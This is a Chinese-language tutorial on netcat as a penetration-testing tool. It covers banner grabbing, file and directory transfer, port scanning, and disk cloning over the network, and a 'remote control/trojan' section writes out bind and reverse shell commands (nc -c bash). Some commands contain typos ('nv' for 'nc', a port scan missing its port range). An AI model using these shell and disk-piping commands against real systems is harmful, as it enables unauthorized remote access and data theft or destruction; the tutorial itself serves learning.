渗透测试基本工具（一）netcat

NV（netcat）被称为网络工具中的瑞士军刀，体积小巧，功能强大，是一个多功能的工具。
主要功能：

telnet / 获取banner信息

[TOC]

这个时候作为nc作为客户端使用，参数为-nv [目标主机ip] [端口号]

bash

nc -nv 192.168.123.134 110 #-v 表示显示详细信息
nc -nv 192.168.123.123 23

传输文本信息

可用于电子取证，保证尽量少的修改目标机器的内容，以免磁盘扇区被覆盖。在自己的电脑上开服务端侦听，在远程电脑上开客户端

bash

# 服务端:
nc -l -p 4444
# 客户端:
nc -nv 1.1.1.1 4444

# 电子取证 将客户端ls结果保存在服务端
# 服务端
nc -l -p 4444 > /tmp/ls.log
# 客户端
ls -al | nc -nv 1.1.1.1 4444 -q 1 # -q 1表示执行完1秒之后断开连接

传输文件/目录

传输文件

bash

# 接收端侦听
nc -lp 333 > 1.mp3
# 发送端：
nc -nv 1.1.1.1 333 < 1.mp4 -q 1
# 也可以反过来再发送端侦听
nc -q 1 -lp 333 < a.mp4
nv -nv 1.1.1.1 333 > 2.mp4

传输目录

bash

先用tar打包然后再发送
#接收端
tar -cvf - music/ | nc -lp 333 -q 1
tar -cvf log.tar music/ | nc -lp 333 q 1
#发送端
nc -nv 1.1.1.1 333 | tar -xvf -

加密传输文件

bash

# 暂时跳过
nc -lp 333 | mcrypt --flush Fbqd -a rijndael-256 -m ecb > 1.mp4

远程控制/木马

分为正向控制和反向控制

bash

# 正向控制
nc -lp 333 -c bash
nv -nv 1.1.1.1 333
# 反向控制
nc -lp 333
nc -nv 1.1.1.1 333 -c bash # 如果是Windows的话则为cmd

加密所有流量

流媒体服务器

远程克隆硬盘

bash

### 接收端 侦听
nc -lp 333 | dd of=/dev/sda
# 发送端
dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描

不如nmap准确，只作为辅助使用

bash

nc -nvz 1.1.1.1-65535 # -z 扫描模式
nc -nvzu 1.1.1.1 1-65535 # 扫描udp端口